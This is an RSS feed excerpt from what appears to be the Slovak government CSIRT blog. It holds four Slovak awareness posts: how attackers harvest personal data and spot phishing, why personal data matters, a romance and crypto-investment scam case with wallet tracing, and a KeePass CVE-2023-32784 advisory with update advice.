		<guid isPermaLink="false">/?p=922</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2023/10/image-2-1024x1024-1.png" alt="" /></p>V dnešnej digitálnej dobe sú osobné údaje ohrozené viac ako kedykoľvek predtým. Kreativita útočníkov na získanie Vašich osobných údajov nemá...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2023/10/image-2-1024x1024-1.png" alt="" /></p>
<p>V dnešnej digitálnej dobe sú osobné údaje ohrozené viac ako kedykoľvek predtým. Kreativita útočníkov na získanie Vašich osobných údajov nemá hranice. Útočníci môžu použiť rôzne metódy na zbieranie osobných údajov svojich obetí, vrátane sociálneho inžinierstva, phishingových útokov alebo prehľadávanie otvorených zdrojov, ako napríklad fotografií na sociálnych sieťach&#8230;</p>



<p><strong><u>Najbežnejšie metódy útočníkov:</u></strong></p>



<p><strong><em>Sociálne inžinierstvo</em></strong>: Zahŕňa manipuláciu obetí za účelom prezradenia ich citlivých informácií. Útočníci vykonávajú online prieskum aktivít svojich obetí a používajú informácie, ktoré nájdu, na získanie ich dôvery a&nbsp;na ich presvedčenie.</p>



<p><strong><em>Reverzné sociálne inžinierstvo: </em></strong>Útočník vytvorí situáciu, pri ktorej obeť sama príde za útočníkom. Ide o sofistikovanú metódu psychickej manipulácie, pri ktorej útočník za použitia štandardných metód sociálneho inžinierstva uvedie obeť do omylu a presvedčí ju, že on je osoba z dôveryhodnej organizácie a iba on vie obeti pomôcť s jej problémom, ktorý rovnako vytvoril on. Viac <a href="https://www.csirt.gov.sk/socialne-inzinierstvo.html">informácií nájdete tu.</a></p>



<p>Taktika: Baiting, Pretexting, DNS spoofing, Scareware, Position of authority, Sense of urgency</p>



<p>Prevedenie: Mail, Smishing, Vishing, podvodná webstránka/aplikácia</p>



<p><strong><em>Extrakcia metadát z&nbsp;fotografií:</em></strong></p>



<p>Útočník dokáže získať rozličné dáta z&nbsp;fotografií, napr. EXIF, dátum a&nbsp;čas, GPS, popis fotky alebo autorské práva. Z fotografií vie útočník získať citlivé informácie o&nbsp;osobe, hlavne ak informujú o dennej rutine človeka, špeciálnych príležitostiach, alebo plánoch a úspechoch.</p>



<p><strong><em>Web scraping:</em></strong></p>



<p>Je proces získavania dát z webových stránok pomocou automatizovaných nástrojov alebo softvéru. Web scraping zo sociálnych sietí umožňuje útočníkom získať rôzne druhy údajov o používateľoch. Napríklad kontaktné informácie, súkromné správy, príspevky a&nbsp;komentáre, sledovanie používateľov alebo profilové informácie.</p>



<p><strong><em>Obsah na sociálnych sieťach:</em></strong></p>



<p>Útočník môže získať informácie o identite a polohe používateľa na základe jeho profilu na sociálnych sieťach. Používatelia často zdieľajú citlivé informácie, ako sú napríklad dátum narodenia, miesto narodenia, rodinný stav, zamestnanie a vzdelanie. &nbsp;Tieto informácie môžu byť použité na vytvorenie falošného profilu alebo na sledovanie používateľa.</p>



<p>Na obrázku nižšie môžeme vidieť príklad&nbsp;phishingového útoku, ktorý navádza obeť na stiahnutie hlasovej správy z&nbsp;aplikácie Outlook. V&nbsp;prvom rade si všimnime emailovú adresu, z&nbsp;ktorej nám prišiel email. Táto doména nepatrí spoločnosti Microsoft, čo si vieme overiť na ich oficiálnej stránke alebo pomocou webovej platformy <a href="https://who.is/">who.is</a> alebo <a href="https://centralops.net/co/">centralops</a>. Po presunutí kurzora na tento odkaz sa nám v&nbsp;ľavom spodnom rohu ukázala webová stránka, kam by sme boli presunutí po kliknutí na odkaz. Nikdy na takýto odkaz <strong><em>NEKLIKAJTE!</em></strong> &nbsp;Za druhé si treba skontrolovať, či vôbec aplikácia Outlook dovoľuje odosielanie hlasových správ, pričom&nbsp;po krátkom prieskume zistíme, že táto možnosť neexistuje. Dbajte na obsah emailu a&nbsp;informácie, ktoré sú v&nbsp;ňom zahnuté. V&nbsp;prípade úspešného presvedčenia obete by sa útočníkovi mohlo podariť získať od nej prihlasovacie údaje, finančné či osobné informácie alebo citlivé informácie, ktoré dokáže zneužiť.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="916" height="849" src="/wp-content/uploads/2024/05/phishmail.png" alt="phishmail" class="wp-image-923"/></figure>



<p>Buďte opatrní voči žiadostiam o priateľstvo a správam od neznámych jednotlivcov. Používateľ sociálnych sietí by mal obmedziť množstvo zdieľaných osobných informácií. Okrem toho odporúčame skontrolovať nastavenie súkromia a upraviť ich tak, aby sa obmedzila viditeľnosť osobných údajov pre verejnosť. Je dôležité byť si týchto rizík vedomý a prijať kroky na svoju ochranu. Týmito opatreniami môžete chrániť samých seba a&nbsp;svojich najbližších pred útočníkmi, ktorí sa snažia zneužiť Vaše osobné údaje na útok proti Vám.&nbsp; <strong>INTERNET NEZABÚDA !!!</strong></p>



<p>Pripravili sme si pre Vás krátky phishingový test, kde si môžete na praktických príkladoch overiť svoje znalosti. Phishingový test: <a rel="noreferrer noopener" href="https://www.csirt.gov.sk/archiv/osvedcene-postupy/navody-a-odporucania/phishingovy-test-871.html?csrt=6113910499060114075" target="_blank">https://www.csirt.gov.sk/archiv/osvedcene-postupy/navody-a-odporucania/phishingovy-test-871.html?csrt=6113910499060114075</a></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2023/10/image-2-1024x1024-1.png" alt="" class="wp-image-926"/></figure>



<p><strong>Budúci týždeň si bližšie predstavíme zneužitie osobných údajov, ktoré sa podarilo kyberútočníkom získať od svojich obetí. Sledujte naše stránky pre viac informácií.</strong></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/922/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Buď múdrejší ako hacker- osobné údaje</title>
		<link>/posts/919</link>
					<comments>/posts/919#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Oct 2023 08:33:22 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[#BeSmarterThanAHacker]]></category>
		<category><![CDATA[CSIRTacik]]></category>
		<guid isPermaLink="false">/?p=919</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/Cybersec-month-2023_week1-1024x1024-1.png" alt="" /></p>V rámci každoročnej kampane Agentúry EÚ pre kybernetickú bezpečnosť (ENISA) sme pre Vás pripravili odporúčania ako „byť múdrejší ako hacker“....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/Cybersec-month-2023_week1-1024x1024-1.png" alt="" /></p>
<p>V rámci každoročnej kampane Agentúry EÚ pre kybernetickú bezpečnosť (ENISA) sme pre Vás pripravili odporúčania ako „byť múdrejší ako hacker“. <strong>Každý týždeň počas októbra 2023 zverejníme tipy, rady a informácie,</strong> ktoré Vám pomôžu pri ochrane všetkých údajov, ktoré sú dôležité a mohli by byť zneužité proti Vám.&nbsp;</p>



<p>Bezpečnosť a ochrana osobných údajov má v súčasnosti zásadný význam. Tieto údaje sú neoddeliteľnou súčasťou našich životov, pretože nám umožňujú identifikáciu a prístup k rôznym službám a produktom. Avšak, súčasne predstavujú značné riziko pre našu bezpečnosť, keďže ich zneužitie môže mať vážne následky, ako napríklad krádež identity alebo finančné straty. V dobe, keď sa stále viac procesov presúva do online prostredia, je ochrana osobných údajov ešte dôležitejšia. Preto by sme mali byť obozretní pri zdieľaní citlivých informácií na internete. Osobné údaje sú cenným majetkom pre každého, ale aj pre útočníkov.</p>



<p><strong><u>Existuje niekoľko dôvodov, prečo sú osobné informácie pre nás dôležité:</u></strong></p>



<p><strong><em>Krádež identity</em></strong>: Útočník môže zneužiť ukradnuté osobné údaje na získanie prístupu k bankovým účtom, kreditným kartám a iným finančným účtom. Tiež môže využiť ukradnuté údaje na získanie nových úverov alebo kreditných kariet v mene obete.</p>



<p><strong><em>Phishing</em></strong>: Útočník môže zneužiť ukradnuté osobné údaje na vytvorenie falošných e-mailov alebo webových stránok, ktoré sa zdajú byť legitímne. Tieto e-maily alebo webové stránky môžu požadovať od obete ďalšie osobné údaje, ako sú heslá alebo citlivé bankové informácie.</p>



<p><strong><em>Špionáž</em></strong>: Útočník môže zneužiť ukradnuté osobné údaje na sledovanie aktivity obete v digitálnom aj reálnom prostredí. <strong>Dokonca aj GPS dáta sú osobné údaje!</strong> Vďaka presnej polohe z GPS dát môže útočník sledovať obeť a monitorovať jej pohyb v reálnom čase. Tento druh sledovania umožňuje útočníkovi obťažovať obeť alebo sa vydávať za niekoho, kto je v jej blízkosti. Účelom tohto konania môže byť manipulácia s obeťou alebo získanie jej dôvery prostredníctvom vykonštruovaných príbehov a situácií.</p>



<p><strong><em>Vydieranie</em></strong>: Útočník môže zneužiť ukradnuté osobné údaje na vydieranie obete. Napríklad môže hroziť zverejnením citlivých informácií, pokiaľ obeť nezaplatí výkupné.</p>



<p><strong><em>Ohováranie</em></strong>: Zneužitie osobných údajov môže byť použité na ohováranie a diskreditáciu obete. Útočníci môžu vytvoriť atmosféru strachu a neistoty, keď využívajú ukradnuté údaje, čo môže postihnúť človeka ale aj organizácie a firmy.</p>



<p><strong><em>Kyberšikana: </em></strong>Kyberšikana je vážnym problémom, ktorý môže mať pre obeť závažné následky. Prejavy kyberšikany môžu zahŕňať napríklad šírenie nepravdivých informácií o obeti, vydávanie sa za ňu.</p>



<p>Je kľúčové si uvedomiť, že správne zaobchádzanie s osobnými informáciami je zásadné pre ochranu súkromia a bezpečnosti jednotlivcov. Preto je nevyhnutné mať jasné pochopenie toho, ako ich správne chrániť a využívať, aby sme zabezpečili naše súkromie a bezpečnosť.</p>



<p><strong>#CSIRTacik #BeSmarterThanaHacker #PrivacyMatters #SafeOnlineLife</strong></p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1024" height="1024" src="/wp-content/uploads/2024/05/Cybersec-month-2023_week1-1024x1024-1.png" alt="" class="wp-image-920"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/919/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Láska na dlh</title>
		<link>/posts/294</link>
					<comments>/posts/294#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 07 Sep 2023 10:58:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Romantic crooks]]></category>
		<category><![CDATA[romantics]]></category>
		<category><![CDATA[Social engineering]]></category>
		<guid isPermaLink="false">/?p=294</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/romanticki-podvodnici-2.jpg" alt="" /></p>O&#160;tom, že je internet skvelý nástroj, nemusíme nikoho presviedčať. Prináša mnoho pozitív, ale zároveň aj riziká a negatíva, ako sú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/romanticki-podvodnici-2.jpg" alt="" /></p>
<p class="has-small-font-size">O&nbsp;tom, že je internet skvelý nástroj, nemusíme nikoho presviedčať. Prináša mnoho pozitív, ale zároveň aj riziká a negatíva, ako sú podvody. Dôsledkom pandémie COVID-19&nbsp; sa v spoločnosti začal zvyšovať záujem o&nbsp;virtuálny svet. Následkom toho narástol počet používateľov na sociálnych sieťach, čo uľahčilo nadväzovanie kontaktov a&nbsp;vzťahov. Na základe vyššej aktivity používateľov v online priestore sa rozšíril aj počet možností podvodov cez internet. Používatelia dnes musia byť opatrnejší ako kedykoľvek predtým. Pomocou zoznamovacích aplikácií sa dokážu používatelia efektívnejšie, rýchlejšie a&nbsp;jednoduchšie zoznámiť s&nbsp;ďalšími ľuďmi. Na druhú stranu to vnáša možnosť aj pre útočníkov, aby dokázali svoje potencionálne obete rýchlejšie vyhľadať a&nbsp;nadviazať s&nbsp;nimi kontakt. A&nbsp;tak sú používatelia vystavení rizikám podvodov, ako napríklad krádež identity, podvodné online obchody, investičné podvody, falošné pokuty, falošné súťaže, romantické podvody&#8230;</p>



<p class="has-small-font-size">Romantické podvody patria medzi obľúbené a&nbsp;pravidelné útoky podvodníkov. Tento typ podvodu umožňuje podvodníkom získať dlhodobý prijem, plynúci z&nbsp;vybudovaného falošného vzťahu s&nbsp;obeťou. Špeciálne pripravený profil, napríklad atraktívnej ženy, ktorá má podobné záujmy, problémy, či názory ako obeť, sa využíva v značnej miere na manipuláciu a odcudzenie finančných prostriedkov obete. Zoznamovacie aplikácie slúžia podvodníkom ako veľmi účinný nástroj na efektívne a&nbsp;rýchle nadviazanie kontaktu so svojou obeťou. Je dôležité poznamenať, že podvodníci, ktorí sa špecializujú na romantické podvody, sú majstri v umení sociálneho inžinierstva. Tí, ktorí vykonávajú romantické podvody sa snažia nadobudnúť dojem autentickej osoby, ktorá je starostlivá a&nbsp;dôveryhodná. Snahou je získať si pozornosť a&nbsp;náklonnosť potencionálnej obete, čo sa im môže podariť aj na základe informácií získaných z&nbsp;profilu a&nbsp;aktivít na sociálnych sieťach. Po tom čo si podvodník získa dôveru svojej obete na spoločných sociálnych témach, prechádza do štádia finančného podvodu. Vo väčšine prípadov sa jedná o&nbsp;spreneverenie peňažných prostriedkov obete. V priebehu komunikácie s obeťou môžu podvodníci používať rôzne metódy, ako napríklad nečakané zdravotné problémy, právne záležitosti, naliehavú potrebu finančných prostriedkov, či vidinu neodolateľnej investície. Títo podvodníci dokážu excelentne manipulovať s emóciami a snažia sa obeť presvedčiť, že takéto platby sú potrebné na vybudovanie dôvery, vyriešenie krízových situácií alebo dokonca na vytvorenie spoločných plánov do budúcnosti. Spomínané dôvody majú v obeti vyvolať pocit, že platby sú nevyhnutné. Zároveň používajú psychologické taktiky, ako je vyvolanie pocitu vďačnosti za pozornosť a pomoc, ktorú útočník poskytuje obeti. To môže spôsobiť, že obeť bude mať sklon vyhovieť ďalším požiadavkám útočníka, aby si udržala tento virtuálny vzťah. Jedným z dôležitých faktorov, pomocou ktorých útočníci dosahujú svoje ciele, je schopnosť vložiť do vzťahu rôzne dôvody, prečo obeť musí posielať opakované platby. Akonáhle podvodník dosiahne prvú platbu od obete, môže ju začať považovať za &#8220;pripravenú&#8221; a zraniteľnejšiu voči ďalšej manipulácii. Tým sa prehlbuje vzťah medzi podvodníkom a obeťou, čo následne povzbudzuje obeť k ďalším platbám a účasti na pochybných finančných transakciách. Je dôležité poznamenať, že osoby, ktoré sa stanú obeťami romantických podvodov, často prechádzajú zložitými emocionálnymi stavmi, kedy sa môžu cítiť osamelé, túžiace po láske a pozornosti. Tieto emócie zneužívajú podvodníci tak, aby jednoduchšie dosiahli svoj cieľ.</p>



<p class="has-small-font-size">Podobné podvody neobchádzajú ani občanov Slovenskej republiky. Vládna jednotka CSIRT je oboznámená bezpečnostným incidentom, ktorý prišiel s veľmi sofistikovanou stratégiou. Zdanlivo nevinná zoznamovacia aplikácia Tinder bola bránou, prostredníctvom ktorej sa dokázal útočník nakontaktovať na svoju obeť. Následne útočník požadoval presunutie konverzácie do aplikácie WhatsApp. V priebehu pravidelnej dvojmesačnej komunikácie sa útočníkovi podarilo nadviazať plnohodnotný virtuálny vzťah s obeťou. Na základe informácií o obeti z verejne dostupných zdrojov dokázal útočník rýchlejšie otvoriť spoločné témy, nadviazať na problémy, koníčky a názory. Vzťah, ktorý dosiahol určitú úroveň dôvery, prešiel k téme financií. V tomto momente už obeť považovala útočníka za blízku osobu. Útočník zneužil popularitu kryptomien a predstavil tento svet ako jedinečnú investičnú príležitosť. Obeť sa rozhodla investovať do sveta kryptoaktív, na základe odporúčania a prezentovaných osobných skúseností útočníka, cez podvodnú platformu. Obeti podvodu vznikla škoda v investovanej čiastke 99 001 amerických dolárov pomocou digitálnej meny USDT (Tether, stablecoin). Obeť si dokonca požičala finančné prostriedky na realizáciu tejto investície od svojho blízkeho okolia a rodiny. Útočník dokázal presvedčiť obeť na celkovo 14 platieb prostredníctvom podvodnej platformy <a href="https://www.bitokc.com/dist/#/. Na">https://www.bitokc.com/.</a> Výhodou spomenutej platformy pre podvodníka je, že nie je možné dohľadanie identity majiteľov alebo prevádzkovateľov webovej stránky. Po zistení, že sa jedná o podvod, sa obeť snažila získať svoje finančné prostriedky od útočníka naspäť. Snaha zvrátiť platby na podvodnej platforme nebola úspešná a falošný profil s menom Tiffany dokonca začal hovoriť o pocite viny. Podvodná platforma Bitokc má pravdepodobne získať dojem relevantnosti a serióznosti falšovaním reálnej spoločnosti, BitOK. Izraelská IT firma, BitOK, bola založená v roku 2021 a podľa dostupných informácií vyvíja vlastný softvér na monitorovanie investičného portfólia.</p>



<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="727" data-id="297" src="/wp-content/uploads/2024/02/falosny_profil_1-1024x727.png" alt="" class="wp-image-297"/></figure>
</figure>



<p class="has-small-font-size">(Obr. č. 1 Falošný profil s&nbsp;menom Tiffany hovorí o&nbsp;pocite viny )</p>



<p class="has-small-font-size">Keďže sa nejedná o&nbsp;ojedinelý prípad, obeť bola kontaktovaná spoločnosťou Cipher Ops vo veci prebiehajúceho podvodu, kde boli rozpoznané viaceré obdobné prevody na softvérovú peňaženku. Spoločnosti Cipher ops sa podarilo vysledovať finančné prostriedky cez viacero peňaženiek na sieti ETH (Ethereum) až na koncový účet, ktorý je vedený na kryptomenovej burze Binance. Útočník si vybral najväčšiu kryptomenovú burzu, Binance, pravdepodobne, kvôli veľmi dobrej povesti a&nbsp;úrovni zabezpečenia. Nevýhodou pre útočníka je KYC overenie identity, kde musí pri registrácií zadať občiansky preukaz. Bez overenia identity nie je schopný vybrať finančné prostriedky z&nbsp;burzy. Útočník pravdepodobne použil údaje nastrčenej osoby.&nbsp; Prostredníctvom forenznej analýzy spoločnosť identifikovala a sledovala adresy kryptomenových peňaženiek cez transakcie, až kým&nbsp; neidentifikovala transakciu, ktorá zahŕňa peňaženku vlastnenú poskytovateľom služieb virtuálnych aktív (VASP). Identifikovať majiteľa adresy kryptomenovej peňaženky, ktorá bola zneužitá na prevod z&nbsp;kryptomien do fiat meny, dokáže spoločnosť len na základe dopytu orgánov činných v&nbsp;trestnom konaní. Na Slovensku patrí k takýmto kompetentným orgánom odbor počítačovej kriminality, Národnej centrály osobitných druhov kriminality na Prezídiu Policajného zboru Slovenskej Republiky . V&nbsp;tomto prípade má burza Binance právo na základe dopytu orgánov činných v&nbsp;trestnom konaní sprístupniť overenie totožnosti klienta (KYC), ktorý je majiteľom peňaženky. Bližšie informácie o&nbsp;sledovaní softvérových peňaženiek nájdete na stránke- <a href="https://www.coingecko.com/learn/crypto-wallet-tracking">https://www.coingecko.com/learn/crypto-wallet-tracking</a>.</p>



<figure class="wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="562" height="229" data-id="296" src="/wp-content/uploads/2024/02/tracking_payments.png" alt="" class="wp-image-296"/></figure>
</figure>



<p class="has-small-font-size">(Obrázok č. 2 Sledovanie prevodu kryptoaktív cez softvérové peňaženky na ethereovej sieti, až na koncovú peňaženku útočníka)</p>



<p class="has-small-font-size">Cipher Ops zistila, že podvodníci presunuli finančné prostriedky obete (resp. aj iných obetí) na koncový účet, ktorý mali vedený spoločnosťou Binance. Obeť preto v tejto veci kontaktovala spoločnosť Binance, ktorá taktiež vyhodnotila, že opisované transakcie sú podozrivé. Uviedla, že na to aby v tejto veci mohla konať, je potrebné, aby ju kontaktovali orgány činné v trestnom konaní prostredníctvom legitímneho webového formulára <a href="https://app.kodexglobal.com/binance/signup">https://app.kodexglobal.com/binance/signup</a>. Kryptomenová burza Binance ponúka technickú podporu pre svojich používateľov aj na Slovensku a&nbsp;v Čechách. Komunikácia s&nbsp;technickou podporou plní svoj účel a&nbsp;používateľ by sa na ňu mal obrátiť vždy, ak nastane jeden zo spomenutých problémov, neautorizovaná transakcia, zablokovaný účet, problém s&nbsp;vkladom alebo overením účtu. Aktuálny zostatok na spomínanej peňaženke zapojenej do opisovaného podvodu je v&nbsp;čase prípravy tohto článku už 1,3 milióna dolárov v digitálnej mene USDT (Tether).</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="712" height="422" src="/wp-content/uploads/2024/02/Screenshot-2024-02-05-123421.png" alt="" class="wp-image-300" style="width:839px;height:auto"/></figure>



<p class="has-small-font-size">(Obrázok č. 3 Komunikácia obete s&nbsp;automatizovanou podporou spoločnosti Binance)</p>



<p class="has-small-font-size"><strong><u>Odporúčania</u></strong></p>



<p class="has-small-font-size">1. Ak máte podozrenie, že ste sa stali obeťou romantického podvodu alebo iného typu podvodu, mali by ste sa obrátiť na príslušné orgány činné v&nbsp;trestnom konaní a vyhľadať pomoc odborníkov vo firmách zameraných na podvody.</p>



<p class="has-small-font-size">2. Pri používaní zoznamovacích aplikácií nezabúdajte na opatrnosť a zachovajte si zdravú dávku skepticizmu, aby ste minimalizovali riziká. Podvody nás varuje pred temnými stránkami virtuálneho sveta, kde útočníci majú podobu falošných charizmatických tvárí, schopných získať si dôveru a zároveň zneužiť emócie svojich obetí vo svoj prospech, alebo obohatenie sa.</p>



<p class="has-small-font-size">3. Na neznámych webových stránkach a&nbsp;neznámym ľudom nikdy nezadávajte osobné údaje, ako sú heslá, čísla kreditných kariet, rodné číslo, dátum narodenia, adresa trvalého pobytu.</p>



<p class="has-small-font-size">4. Dávajte si pozor na podozrivé ponuky pri sľuboch vysokých ziskov s minimálnym rizikom. Každá investícia nesie určité riziko, preto je dôležité, aby ste boli realistickí, pokiaľ ide o potenciálne výnosy. Uistite sa, že je finančná služba riadne zaregistrovaná a licencovaná príslušnými finančnými orgánmi a má dobrú povesť medzi investormi.</p>



<p class="has-small-font-size">5. Pred nákupom tovarov alebo služieb od neznámych predajcov si overte ich dôveryhodnosť a prečítajte si recenzie od iných zákazníkov.</p>



<p class="has-small-font-size">6. Používajte bezpečné spôsoby online platieb, napríklad overené platobné brány a vyhýbajte sa nezabezpečeným spôsobom platieb.</p>



<p class="has-small-font-size">7. Buďte opatrní pri klikaní na odkazy v e-mailoch alebo správach. Môžu viesť na falošné webové stránky, ktoré sa snažia získať vaše údaje. Využívajte prepojenia len cez oficiálne webové stránky alebo zadávajte odkaz na webovú stránku manuálne do prehliadača.</p>



<p class="has-small-font-size">8. Nepodliehajte tlaku na rýchle rozhodnutie. Seriózne investičné príležitosti vám poskytnú dostatok času na vykonanie prieskumu, zváženie možností investovania.</p>



<p class="has-small-font-size">9. Dbajte na svoju kybernetickú bezpečnosť. Na prístup k investičným účtom používajte silné heslá a dvojfaktorovú autentifikáciu a vyhýbajte sa zdieľaniu citlivých údajov prostredníctvom nezabezpečených kanálov.</p>



<p class="has-small-font-size">10. Investujte len peniaze, ktoré si môžete dovoliť stratiť. Nikdy neinvestujte peniaze určené na základné životné náklady, úspory alebo peniaze, ktoré ste si požičali. Pred každou investíciou buďte opatrní a riadne zvážte svoju finančnú situáciu.</p>



<p class="has-small-font-size">Zdroj: </p>



<p class="has-small-font-size"><a href="https://www.fbi.gov/how-we-can-help-you/safety-resources/scams-and-safety/common-scams-and-crimes/romance-scams">https://www.fbi.gov/how-we-can-help-you/safety-resources/scams-and-safety/common-scams-and-crimes/romance-scams</a></p>



<p class="has-small-font-size"><a href="https://www.coingecko.com/learn/crypto-wallet-tracking">https://www.coingecko.com/learn/crypto-wallet-tracking</a></p>



<p class="has-small-font-size"><a href="https://www.linkedin.com/pulse/reported-crypto-investment-websites-2023-rodney-wilhelm/">https://www.linkedin.com/pulse/reported-crypto-investment-websites-2023-rodney-wilhelm/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/294/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť KeePass umožňuje získať hlavné heslo z pamäte</title>
		<link>/posts/914</link>
					<comments>/posts/914#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 14 Jun 2023 08:27:11 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=914</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/05/keepass-300x157-1.webp" alt="" /></p>Spoločnosť KeePass vydala verziu KeePass 2.54, ktorá opravuje kritickú zraniteľnosť ohrozujúcu bezpečnosť citlivých dát používateľov aplikácie. Útočník má možnosť získať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/05/keepass-300x157-1.webp" alt="" /></p>
<p><strong>Spoločnosť KeePass vydala verziu KeePass 2.54, ktorá opravuje kritickú zraniteľnosť ohrozujúcu bezpečnosť citlivých dát používateľov aplikácie. Útočník má možnosť získať dáta z neošetreného textového poľa „SecureTextBoxEx“, ktoré sa používa pre zadávanie hlavného hesla, ako aj pre úpravu hesiel. Zneužitie predmetnej zraniteľnosti umožňuje útočníkovi extrahovať citlivé údaje z výpisu pamäte aplikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>KeePass 2.x &lt; 2.54</p>



<p><strong>Opis činnosti:&nbsp;&nbsp;&nbsp;&nbsp;</strong></p>



<p>KeePass je bezplatný, open-source software určený pre bezpečné spravovanie hesiel. Slúži ako digitálny trezor, v ktorom môžu užívatelia ukladať svoje citlivé informácie. KeePass šifruje dáta pomocou hlavného kľúča alebo hlavného hesla, ktoré je potrebné zadať pre prístup k uloženým informáciám.</p>



<p><em>CVE-2023-32784</em>&nbsp;(CVSS skóre 7,5)<strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></p>



<p>Zraniteľnosť sa nachádza v&nbsp;textovom poli&nbsp;SecureTextBoxEx. Toto pole je používané v&nbsp;rôznych častiach aplikácie, ale aj na zadávanie hlavného hesla. Na základe spôsobu, akým služba .NET CLR prideľuje reťazce, by mali byť vstupy pravdepodobne usporiadané v&nbsp;pamäti. Útočník môže získať heslo, len ak bolo vložené pomocou klávesnice a nie pomocou kopírovania zo schránky. Najnovšia verzia populárneho správcu hesiel využíva Windows API k manipulácii s dátami z textových polí, čo účinne zabraňuje vytvoreniu spravovaných reťazcov, ktoré by mohli byť extrahované z výpisu&nbsp;pamäte. Zraniteľnosť je možné zneužiť iba lokálne.</p>



<p>Zraniteľnosť objavil bezpečnostný výskumník so pseudonymom vdohney, ktorý publikoval a&nbsp;ukážku jej zneužitia.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Únik citlivých informácií</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame bezodkladnú aktualizáciu systému KeePass. Používateľom, ktorí dlhšie používali KeePass a&nbsp;ich heslá mohli byť uložené do hibernačných a&nbsp;swapových súborov, sa odporúča zmeniť svoje hlavné heslo, zmazať hibernačné a swapové súbory, ktoré mohli obsahovať fragmenty hlavného hesla, alebo vykonať čistú inštaláciu operačného systému.</strong></p>



<p><strong>KeePass 1.x, Strongboxu alebo KeePassXC nie sú zasiahnuté touto zraniteľnosťou.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/keepass-v254-fixes-bug-that-leaked-cleartext-master-password/">https://www.bleepingcomputer.com/news/security/keepass-v254-fixes-bug-that-leaked-cleartext-master-password/</a></p>



<p><a href="https://securityaffairs.com/146404/hacking/keepass-2-x-master-password-dumper.html">https://securityaffairs.com/146404/hacking/keepass-2-x-master-password-dumper.html</a></p>



<p><a href="https://keepass.info/news/n230603_2.54.html">https://keepass.info/news/n230603_2.54.html</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/914/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
